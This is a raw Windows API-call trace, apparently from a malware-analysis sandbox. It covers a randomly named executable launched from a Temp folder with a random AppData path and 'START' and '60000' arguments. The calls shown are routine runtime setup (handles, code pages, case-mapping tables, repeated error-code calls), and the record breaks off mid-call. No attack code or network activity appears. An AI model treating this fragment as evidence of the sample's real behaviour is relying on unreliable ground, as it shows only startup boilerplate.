lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13807d0)) [0096.088] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0096.088] GetFileType (hFile=0x3) returned 0x0 [0096.088] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0096.088] GetFileType (hFile=0x7) returned 0x0 [0096.088] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0096.088] GetFileType (hFile=0xb) returned 0x0 [0096.088] SetHandleCount (uNumber=0x20) returned 0x20 [0096.088] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0096.088] GetEnvironmentStringsW () returned 0x14fc70* [0096.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0096.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13811f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0096.088] FreeEnvironmentStringsW (penv=0x14fc70) returned 1 [0096.088] GetLastError () returned 0x6 [0096.088] SetLastError (dwErrCode=0x6) [0096.088] GetLastError () returned 0x6 [0096.088] SetLastError (dwErrCode=0x6) [0096.088] GetLastError () returned 0x6 [0096.088] SetLastError (dwErrCode=0x6) [0096.088] GetACP () returned 0x4e4 [0096.089] GetLastError () returned 0x6 [0096.089] SetLastError (dwErrCode=0x6) [0096.089] IsValidCodePage (CodePage=0x4e4) returned 1 [0096.089] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0096.089] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0096.089] GetLastError () returned 0x6 [0096.089] SetLastError (dwErrCode=0x6) [0096.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0096.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0096.089] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0096.089] GetLastError () returned 0x6 [0096.089] SetLastError (dwErrCode=0x6) [0096.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0096.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ") returned 256 [0096.090] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0096.090] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0096.090] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xc6\x5c\x6c\xf8\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0096.090] GetLastError () returned 0x6 [0096.090] SetLastError (dwErrCode=0x6) [0096.090] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0096.090] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ") returned 256 [0096.090] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0096.090] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0096.090] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xc6\x5c\x6c\xf8\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0096.090] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.090] SetLastError (dwErrCode=0x0) [0096.090] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.091] SetLastError (dwErrCode=0x0) [0096.091] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.092] SetLastError (dwErrCode=0x0) [0096.092] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.093] SetLastError (dwErrCode=0x0) [0096.093] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError (dwErrCode=0x0) [0096.094] GetLastError () returned 0x0 [0096.094] SetLastError 